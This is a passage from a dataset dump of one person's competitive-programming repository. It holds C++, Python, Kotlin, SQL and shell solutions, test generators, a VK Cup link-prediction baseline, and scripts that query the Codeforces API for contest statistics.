%d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[x] = i;\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n int n, m;\n readln(n, m);\n a.resize(n + 1, 0);\n b.resize(n + 1, false);\n readln(a, n);\n a[0] = 0;\n writeln(a);\n for (int i = 1; i <= n; i++)\n if (!b[i])\n {\n int counter = 0;\n int s = i;\n while (a[s] != 0)\n {\n b[s] = true;\n s = a[s];\n counter++;\n }\n if (counter)\n c.push_back(counter);\n }\n writeln(c);\n return 0;\n}\n" }, { "alpha_fraction": 0.49859419465065, "alphanum_fraction": 0.5238987803459167, "avg_line_length": 25.674999237060547, "blob_id": "acbe08793d0f4caadfa830d0e3e23dd8d5905a77", "content_id": "7d3d6bbbd26625550c5c33daf1e817b881aed28f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2134, "license_type": "no_license", "max_line_length": 82, "num_lines": 80, "path": "/2021/vkcupMl/baseline.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\ntrainFile = 
'../SUBMIT/big.csv'\n\nfriends = {}\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\nwith open(trainFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader, total = 17414510):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 20000:\n # break\n\nfriendsCount = []\nfor u, fs in friends.items():\n if u % 2 == 1:\n friendsCount.append([len(fs), u])\nfriendsCount.sort(reverse = True)\n\ndef log(x):\n return math.log(max(2, x))\n\ndef getAA(sz, uw, vw):\n return log(100 - uw[0]) * log(100 - vw[0]) * log(uw[1]) * log(vw[1]) / log(sz)\n\npossible = {}\n\ndef add(u, v, value):\n if value == 0: return\n if not u in possible:\n possible[u] = {}\n if not v in possible[u]:\n possible[u][v] = 0\n possible[u][v] += value\n\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 2.9: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 2.9: continue\n add(u, v, getAA(l, uw, vw))\n\nprint('Predictions done')\nanswers = []\nfor u, variants in tqdm(possible.items(), total = len(possible)):\n pos = []\n for v, value in variants.items():\n pos.append((value, v))\n\n if len(pos) > 0:\n pos.sort(reverse = True)\n # for (count, v) in friendsCount:\n # if len(pos) < 10:\n # if v > u:\n # pos.append((count, v))\n # else:\n # break\n\n answers.append((u, ','.join(map(lambda p: str(p[1]), pos[:10]))))\n\nanswers.sort()\nprint('ANSWERS:', len(answers))\nwith open('submit.txt', 'w') as submit:\n for row in tqdm(answers, total = len(answers)):\n submit.write(f'{row[0]}: {row[1]}\\n')\nprint('DONE');\n" }, { "alpha_fraction": 0.5319865345954895, "alphanum_fraction": 0.5392255783081055, "avg_line_length": 27.01886749267578, "blob_id": 
"b8baae5e4f88e4576c7d44937a30311d784269fe", "content_id": "e7bc216383a62e455bc74ddcacffea4c87401388", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5940, "license_type": "no_license", "max_line_length": 539, "num_lines": 212, "path": "/2014/gcj2014_1B/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n#define FILENAME \"input\"\n#define INF 1000000007\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... 
tail);\nvoid writeln(){printf(\"\\n\");}void readln(){}\nstruct graph{vector<vector<int>> edges;int n;graph(int);graph(int, int);graph();void createGraph(int);void add_edge(int, int);void add_or_edge(int, int);void writelnMatrix();void writeln();};\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint n, m;\nstring ans;\nvector< vi > edges;\nvector< string > s;\nvector< bool > used;\n\nvoid readInput()\n{\n ans = \"\";\n edges.clear();\n s.clear();\n used.clear();\n readln(n, m);\n s.resize(n);\n edges.resize(n);\n used.resize(n);\n readln(s);\n int x, y;\n fori(m)\n readln(x, y),\n edges[--x].pb(--y),\n edges[y].pb(x);\n}\n\nvoid writeOutput()\n{\n writeln(ans);\n}\n\nvoid dfs(int u, vector<bool>&used)\n{\n used[u] = true;\n fori(edges[u].size())\n if (!used[edges[u][i]])\n dfs(edges[u][i], used);\n}\n\nbool debug = true;\nbool ckech(stack<int>st, vector<bool> used)\n{\n// if (st.size())\n // writeln(st.top());\n while (st.size())\n dfs(st.top(), used),\n st.pop();\n if (!debug)\n writeln(used);\n fori(n)\n if(!used[i])\n return false;\n return true;\n}\n\nvoid ff(){};\nstring dij(stack<int> path, int beg)\n{\n int start = beg;\n debug ? ff() : writeln(\"started algo at\", start + 1);\n\tstring qwre = \"\";\n used[start] = true;\n\tset<pair<string, pii>> q;\n\tfori(edges[start].size())\n if (!used[edges[start][i]])\n q.insert({s[edges[start][i]], {start, edges[start][i]}}),\n debug ? ff() : writeln(\"added edge from\", start + 1, \"to\", edges[start][i] + 1);\n// stack<int> path;\n path.push(start);\n\twhile (!q.empty())\n\t{\n debug ? 
ff() : writeln(\"from\", (q.begin()->second).first + 1, \"to\", (q.begin()->second).second + 1);\n\t\tstart = (q.begin()->second).second;\n\t\tstring sadf = q.begin()->first;\n\t\tq.erase(q.begin());\n\t\tif (used[start])\n continue;\n if (!debug)\n qwre += \" \";\n qwre += sadf;\n\t\tused[start] = true;\n\t\tpath.push(start);\n fori(edges[start].size())\n if (!used[edges[start][i]])\n q.insert({s[edges[start][i]], {start, edges[start][i]}}),\n debug ? ff() : writeln(\"added edge from\", start + 1, \"to\", edges[start][i] + 1);\n debug ? ff() : writeln(\"start :\", start + 1);\n while (q.size() > 0 && used[(q.begin()->second).second])\n q.erase(q.begin());\n debug ? ff() : writeln(\"wanted :\", (q.begin()->second).second + 1);\n\t\twhile (path.size() > 0 && ((q.begin()->second).first != path.top()))\n\t\t{\n start = path.top();\n if (start == beg)\n goto fin;\n path.pop();\n debug ? ff() : writeln(\"to delete\", start + 1);\n fori(edges[start].size())\n q.erase({s[edges[start][i]], {start, edges[start][i]}});\n if (!ckech(path, used))\n qwre += dij(path, start);\n\t\t}\n // qwre += dij(path, start);\n\t}\n\tfin:\n//\twriteln(\"exited\");\n return qwre;\n}\n\nvoid solve()\n{\n used.clear();\n used.resize(n, false);\n int st = min_element(s.begin(), s.end()) - s.begin();\n stack<int> wert;\n ans = s[st] + dij(wert, st);\n}\n\nvoid run(bool d)\n{\n debug = !d;\n readInput();\n solve();\n writeOutput();\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n int T;\n readln(T);\n forn(q, T)\n printf(\"Case #%d: \", q + 1),\n run(q==-1);\n// q + 1 == 17 ? 
writeln(edges), writeln(s) : ff();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ngraph::graph(int n){this->n = n;edges.resize(n);int t;fori(n){edges[i].resize(n);forj(n)readln(t),edges[i][j] = t == '1';}}graph::graph(int n, int m){this->n = n;edges.resize(n);int u, v;fori(m)readln(u, v),add_edge(u - 1, v - 1);}void graph::add_edge(int u, int v){edges[u].pb(v);}void graph::add_or_edge(int u, int v){edges[u].pb(v);edges[v].pb(u);}graph::graph(){};void graph::createGraph(int n){edges.resize(n);}void graph::writeln(){fori(n)forj(edges[i].size())::writeln(i, edges[i][j]);}void graph::writelnMatrix(){::writeln(edges);}\nvoid print(double a){printf(\"%f \", a);}\nvoid print(int a){printf(\"%d \", a);}\nvoid print(string a){printf(\"%s \", a.c_str());}\nvoid print(long long a){printf(\"%lld \", a);}\nvoid print(unsigned long a){printf(\"%ld \", a);}\nvoid print(char a){printf(\"%c \", a);}\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i = 0; i < a.size(); ++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type>>& a){for(int i = 0; i < a.size(); ++i)writeln(a[i]);}\nvoid read(double &a){scanf(\"%lf\", &a);}\nvoid read(int &a){scanf(\"%d\", &a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\", &a);}\nvoid read(char &a){scanf(\"%c\", &a);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if (a.size() == 0){int n; read(n); a.resize(n);}for(int i = 0; i < a.size(); ++i)read(a[i]);}\ntemplate<class Type>\nvoid read(vector<vector<Type>> &a){for(int i = 0; i < a.size(); ++i)readln(a[i]);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print(head);writeln(tail...);}\ntemplate <class Head, class... Tail>\nvoid readln(Head& head, Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.3860589861869812, "alphanum_fraction": 0.40482574701309204, "avg_line_length": 16.372093200683594, "blob_id": "be8f7fe7fe4eda2c1ea886807bf315ebca966eda", "content_id": "5cd626c5e35571ae669177421a5b85eb25253109", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 746, "license_type": "no_license", "max_line_length": 42, "num_lines": 43, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n#include <set>\n#define pb push_back\n \nusing namespace std;\n \n \nvoid run()\n{\n string s;\n int n;\n cin >> n;\n getline(cin, s);\n int a[26];\n for (int i = 0; i < 26; ++i)\n a[i] = 0;\n while(getline(cin, s))\n {\n int j = 0;\n while (s[j] == ' ')\n j++;\n a[s[j] - 'A'] = 1;\n }\n cout << \"Yes\\n\";\n string t = \"\";\n for (int i = 0; i < 26; ++i)\n if (a[i])\n t.pb(i + 'A'),\n t += \"| ~\",\n t.pb(i + 'A'),\n t.pb('|');\n cout << t.substr(0, t.size() - 1);\n}\n \nint main()\n{\n freopen(\"important.in\", \"r\", stdin);\n freopen(\"important.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.4458598792552948, "alphanum_fraction": 0.46496814489364624, "avg_line_length": 18.625, "blob_id": "12d74a854e569b4fc2833440ecced87c433ffa80", "content_id": "234504d3caf0d3fcdbc382c3ba88e2ed55168a6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 157, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/scripts/lines.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mask='*.lua'\na=0\nfor i in $mask; do\n b=$(cat \"$i\" | nl | tail -1 | awk '{print $1;}')\n echo $a $b $i\n a=$(python -c \"print ($a + $b)\")\ndone\necho $a\n" }, { "alpha_fraction": 0.42447417974472046, "alphanum_fraction": 0.4608030617237091, 
"avg_line_length": 19.115385055541992, "blob_id": "63750fe62c53e3dd020b27a0d67812ac321fd8af", "content_id": "eca8f83e311848b6dfe90582d6574f2227047de0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 523, "license_type": "no_license", "max_line_length": 51, "num_lines": 26, "path": "/CodeForce/0518/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n\nusing namespace std;\n#define count asasdaiusdyfoiuqwfd\nint count[300];\n\nint main()\n{\n string s, t;\n cin >> s >> t;\n for (char c : s)\n count[c]++;\n int ura = 0, zopa = 0;\n for (char& c : t)\n if (count[c])\n ura++,\n count[c]--,\n c = 0;\n for (char c : t)\n if (c && count[c ^ 32])\n zopa++,\n count[c ^ 32]--;\n cout << ura << \" \" << zopa;\n return 0;\n}\n" }, { "alpha_fraction": 0.467980295419693, "alphanum_fraction": 0.4926108419895172, "avg_line_length": 43.375, "blob_id": "7185a6aa9737e092ca239bd2d18e08a2a7f4138c", "content_id": "cdf442b4b54bfd8dd93a1b9dc9b86f7f62f4322a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1421, "license_type": "no_license", "max_line_length": 115, "num_lines": 32, "path": "/2022/yandexBackend/C.sql", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "CREATE FUNCTION inter(integer, integer, integer, integer, integer, integer, integer, integer)\nRETURNS boolean AS 'select sign($1*$4-$2*$3-$1*$6+$2*$5+$3*$6-$4*$5) != sign($1*$4-$2*$3-$1*$8+$2*$7+$3*$8-$4*$7)'\nLANGUAGE SQL\nIMMUTABLE\nRETURNS NULL ON NULL INPUT;\n\nselect id \n from Points\n where _X_LEFT_ <= \"x\" and \"x\" <= _X_RIGHT_ and _Y_BOTTOM_ <= \"y\" and \"y\" <= _Y_TOP_\nunion all\n\nselect id\n from Lines\n where \n (_X_LEFT_ <= \"begin_x\" and \"begin_x\" <= _X_RIGHT_ and _Y_BOTTOM_ <= \"begin_y\" and \"begin_y\" <= _Y_TOP_)\n or (_X_LEFT_ <= \"end_x\" and \"end_x\" <= _X_RIGHT_ and _Y_BOTTOM_ 
<= \"end_y\" and \"end_y\" <= _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_LEFT_, _Y_BOTTOM_, _X_LEFT_, _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_LEFT_, _Y_BOTTOM_, _X_RIGHT_, _Y_BOTTOM_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_RIGHT_, _Y_TOP_, _X_LEFT_, _Y_TOP_)\n or inter(\"begin_x\", \"begin_y\", \"end_x\", \"end_y\", _X_RIGHT_, _Y_TOP_, _X_RIGHT_, _Y_BOTTOM_);\n\nselect id \n from Points\n where 1 <= \"x\" and \"x\" <= 2 and 1 <= \"y\" and \"y\" <= 2\nunion all\n\nselect id\n from Lines\n where \n (1 <= \"begin_x\" and \"begin_x\" <= 2 and 1 <= \"begin_y\" and \"begin_y\" <= 2)\n or\n (1 <= \"end_x\" and \"end_x\" <= 2 and 1 <= \"end_y\" and \"end_y\" <= _Y_TOP)\n\n" }, { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5657567977905273, "avg_line_length": 20.210525512695312, "blob_id": "f02883781164f8cdf3dd36f845b9bf0e6da39c25", "content_id": "3643a6e3bc003eed5a32c966107b014c99a0d597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 403, "license_type": "no_license", "max_line_length": 46, "num_lines": 19, "path": "/scripts/tshirts.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"testlib.h\"\n#include <iostream>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n int seed = atoi(argv[1]);\n int len = atoi(argv[2]);\n int nwinners = 50;\n rnd.setSeed(seed);\n \n set<int> winners;\n while (winners.size() < nwinners)\n winners.insert(50 + rnd.next(1, len));\n \n for (auto winner: winners)\n cout << winner << \" \";\n cout << endl;\n}\n" }, { "alpha_fraction": 0.3449612259864807, "alphanum_fraction": 0.38372093439102173, "avg_line_length": 18.11111068725586, "blob_id": "fdc1ea0c4cb4e5060000f46fd286b1bc925f64a2", "content_id": "3072f9835651971a5c95b78be8c84293902333dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 516, 
"license_type": "no_license", "max_line_length": 42, "num_lines": 27, "path": "/2020/snws5/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\n\ncommands = ('( ' + input() + ' )').split()\nstack = [[]]\nadd = 0\nmod = 998244353\n\nfor c in commands:\n if c == '(':\n add += 1\n stack.append([])\n elif c == ')':\n add += 1\n x = stack.pop()\n temp = x[0]\n for i in range(1, len(x)):\n if add % 2 == 0:\n temp += x[i]\n else:\n temp *= x[i]\n temp %= mod\n stack[-1].append(temp)\n else:\n stack[-1].append(int(c))\n\n\nprint(stack[0][0])\n" }, { "alpha_fraction": 0.46875, "alphanum_fraction": 0.4861111044883728, "avg_line_length": 25.18181800842285, "blob_id": "efe86aeb91964c0cc6566d908b156e1ea457cb4e", "content_id": "ff0af57174072623c80a227de59e8611bb51263a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 76, "num_lines": 11, "path": "/2015/yaQual/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nl = [0] * n\nr = [0] * n\nc = [0] * n\nfor i in range(n):\n l[i], r[i] = map(int, input().split())\nm = int(input())\nfor i in list(map(int, input().split())):\n c[i - 1] += 1\nfor i in range(n):\n print(\"Red\" if c[i] > r[i] else (\"Orange\" if c[i] >= l[i] else \"Green\"))\n" }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.542553186416626, "avg_line_length": 46, "blob_id": "3aeb2333c173cd822f7dc44d90bcb29d56e50956", "content_id": "308868f2ea4b95791c3480c440cd1447898dec7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/2015/YaWarm/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "x1,y1,x2,y2=map(int,input().split())\nprint(str((y1+y2)*(y1+y2)+(x1-x2)*(x1-x2))+\".\"+(\"0\"*20))\n" }, { "alpha_fraction": 
0.40086206793785095, "alphanum_fraction": 0.4267241358757019, "avg_line_length": 23.421052932739258, "blob_id": "82dcb15ff92917d8411f83ffc9d20c26d67f1368", "content_id": "e16cade0cd12ff33c3626327144a236e68f53307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/CodeForce/gym/101095/X.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "m = int(input())\nmoney = list(map(int, input().split()))\n\nmx = 0\nlower = 500\nfor i in range(11):\n if money[i] <= m:\n for j in range(i + 1, 12):\n temp = (m // money[i]) * money[j] - (m // money[i]) * money[i]\n if temp > mx or temp == mx and lower > money[i]:\n mx = temp\n lower = money[i]\n I = i\n J = j\n\nif mx <= 0:\n print(\"IMPOSSIBLE\")\nelse:\n print(I + 1, J + 1, mx)\n" }, { "alpha_fraction": 0.6440443396568298, "alphanum_fraction": 0.6537396311759949, "avg_line_length": 38.02702713012695, "blob_id": "cf8269404abecfbb9f06854b9129880238069de9", "content_id": "dfb4c0240971c36df8ccb468a2d1c413b341e779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2888, "license_type": "no_license", "max_line_length": 147, "num_lines": 74, "path": "/scripts/cf/plotSubmits.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\n\ndef cf(method, **kwargs):\n params = dotdict(kwargs)\n req = requests.get('https://codeforces.com/api/' + method, params = params)\n ret = req.json()\n status = ret['status']\n if status != 'OK':\n comment = ret['comment']\n print(f'Error in {method} {status}: {comment}', kwargs)\n print(req.text)\n return None\n return ret\n\ndef getSubmits(contestId):\n def getter(**kwargs):\n return cf('contest.status', **kwargs)\n return unlimited(getter, 'result', 10000, True, count_field = 'count', offset_field 
= 'from', starting_offset = 1, contestId = contestId)\n\n\[email protected]()\[email protected]('contest_id', required=True, type=int, nargs=1)\[email protected]('-m', '--minutes', help='Stat for last <minutes>', default=20)\[email protected]('-u', '--unofficial', is_flag=True, help='Show only unofficial participants', default=False)\ndef plotContest(contest_id, minutes, unofficial):\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n contest = cf('contest.standings', **{'from': 1, 'contestId': contest_id, 'count': 1}).result.contest\n duration = contest.durationSeconds // 60\n title = contest.name\n submits = getSubmits(contest_id)\n\n def getDate(submit):\n return submit.relativeTimeSeconds / 60\n\n off = list(filter(lambda submit: submit.author.participantType == 'CONTESTANT', submits))\n unoff = list(filter(lambda submit: submit.author.participantType == 'OUT_OF_COMPETITION', submits))\n\n legend = []\n dates = []\n\n def getLast(submits, minutes):\n return len(list(filter(lambda d: d >= duration - minutes, submits))) * 100\n\n def add(submits, constestants):\n all_submits = list(map(getDate, filter(lambda submit: submit.verdict != 'OK', submits)))\n ok_submits = list(map(getDate, filter(lambda submit: submit.verdict == 'OK', submits)))\n dates.append(ok_submits)\n dates.append(all_submits)\n count_ok_last_minutes = getLast(ok_submits, minutes)\n count_all_last_minutes = getLast(all_submits, minutes)\n legend.append(f'{constestants} OK ({len(ok_submits)}), {count_ok_last_minutes / len(ok_submits):.0f}% in last {minutes} minutes')\n legend.append(f'{constestants} Incorrect ({len(all_submits)}), {count_all_last_minutes / len(all_submits):.0f}% in last {minutes} minutes')\n\n if unofficial:\n add(unoff, 'unofficial')\n else:\n add(off, 'official')\n\n fig, ax = plt.subplots(1, 1)\n ax.hist(dates, bins=duration, stacked=True)\n ax.legend(legend)\n # ax.xaxis.set_major_formatter(mdates.AutoDateFormatter())\n plt.xlabel('Time')\n plt.ylabel('Count 
of submits')\n plt.title(title)\n plt.savefig(title.replace(r'\\s', '') + '.png', dpi=900);\n # plt.show()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.5622236132621765, "alphanum_fraction": 0.5742261409759521, "avg_line_length": 32.680850982666016, "blob_id": "ba64de48f406c54a1cfede4f3ce7edf0ce04c80f", "content_id": "c288dd4cb1666468ff6a7170a50a5aa08c6dd80d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "no_license", "max_line_length": 125, "num_lines": 47, "path": "/scripts/cf/allContests.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\nfrom plotSubmits import cf\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import datetime\nimport time\nfrom collections import defaultdict\n\n\ndef main():\n contests = sys.argv[1:]\n participants = dotdict()\n for contestId in contests:\n print(contestId)\n contest = cf('contest.standings', contestId = contestId, **{'from': 1}, lang = 'en', showUnofficial = True)['result']\n for participant in contest['rows']:\n name = participant.party.members[0].handle\n t = participant.party.participantType\n rank = participant.rank\n points = participant.points\n if points <= 0:\n continue\n if name not in participants:\n participants[name] = dotdict(off = 0, unoff = 0, both = 0, place = 0)\n if t == 'CONTESTANT':\n participants[name].off += 1\n participants[name].both += 1\n participants[name].place += rank\n elif t == 'OUT_OF_COMPETITION':\n participants[name].unoff += 1\n participants[name].both += 1\n participants[name].place += rank\n time.sleep(2)\n\n items = participants.items()\n items = list(sorted(items, key = lambda x: [x[1].both, x[1].place]))\n print('name', 'cnt', '\\\\sigma_place', 'off', 'unoff')\n for k, v in items:\n if v.both >= len(contests):\n print(k, v.both, v.place, v.off, v.unoff)\n\n\nif 
__name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.3099173605442047, "alphanum_fraction": 0.3305785059928894, "avg_line_length": 39.33333206176758, "blob_id": "2983fe852fe9baefd1618f6bba40712abb754c13", "content_id": "5952f010670b401bdab6e212128aa31a7e5ce9fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 118, "num_lines": 6, "path": "/2014/RCC2014_1B/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "T = int(input())\nfor TT in range(T):\n n, m, p, q, t = map(int, input().split())\n k = n % (t / p)\n z = m % (t / q)\n print(1 + n / (t / p) + m / (t / q) - (k == 0) - (z == 0) + ((t / p, k)[k == 0] * p + (t / q, z)[z == 0] * q > t))\n" }, { "alpha_fraction": 0.4406779706478119, "alphanum_fraction": 0.508474588394165, "avg_line_length": 18.66666603088379, "blob_id": "2144d4d8a9dba4516a865b8f779f0088cdba1568", "content_id": "2ec2f7d35ce782e5de0d860f8169d713b088d6e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 33, "num_lines": 3, "path": "/CodeForce/1645/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 5\nprint(n)\nprint(*[n - i for i in range(n)])\n" }, { "alpha_fraction": 0.445328027009964, "alphanum_fraction": 0.47514909505844116, "avg_line_length": 21.863636016845703, "blob_id": "ea41d190a17eb09e7f2811af606d4829237d4a53", "content_id": "3351291c13fa9665d6818cfc7a966cd27788c5f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 503, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/2017/newYear/H.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*\n\nval random = Random()\nfun rand(from: Int, to: Int) : Int {\n return random.nextInt(to - from) + 
from\n}\n\nfun main(args: Array<String>) {\n val s = Scanner(System.`in`)\n val ans = mutableListOf<Int>()\n with(s) {\n val n = nextInt()\n for (i in 1 .. n) {\n if (n <= 30) {\n ans.add(1 shl i)\n } else {\n ans.add(rand(0, 1000000000))\n }\n }\n println(ans.joinToString(separator = \" \"))\n }\n}\n" }, { "alpha_fraction": 0.5793103575706482, "alphanum_fraction": 0.5957559943199158, "avg_line_length": 24.445945739746094, "blob_id": "c9e37aabad4a4980fd9ead6a2c3b852680fa649e", "content_id": "a5935503d0c20175987be8211ed49a344a09908f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 64, "num_lines": 74, "path": "/2021/vkcupMl/train.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom joblib import dump, load\n\n\ntrainFile = './TRAIN/trainSmall.csv'\ntestFile = './TRAIN/testSmall.csv'\n\nfriends = {}\ntrain = {}\nX = []\ny = []\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\nprint('Reading friends')\n\nwith open(trainFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 300000:\n # break\n\n# friendsCount = []\n# for u, fs in friends.items():\n # friendsCount.append([len(fs), u])\n# friendsCount.sort(reverse = True)\n# print(friendsCount[:1000])\n\nprint('Reading answers')\n\nwith open(testFile, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n if not u in train:\n train[u] = set()\n 
train[u].add(v)\n\nprint('Getting X and y')\n\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 0.25: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 0.25: continue\n X.append([l, *uw, *uw])\n y.append(u in train and v in train[u])\n\nprint('Predictions done')\n\nclf = make_pipeline(StandardScaler(), DecisionTreeClassifier())\nclf.fit(X, y)\ndump(clf, 'filename.joblib2')\n\nprint('Classifier saved')\n\n\n" }, { "alpha_fraction": 0.3179680109024048, "alphanum_fraction": 0.3433678150177002, "avg_line_length": 20.714284896850586, "blob_id": "c4d255c77b7aa0bd04b8b63b85c852f559d803f2", "content_id": "4babe5006872aa39185cdec7b911d7d270db1503", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1063, "license_type": "no_license", 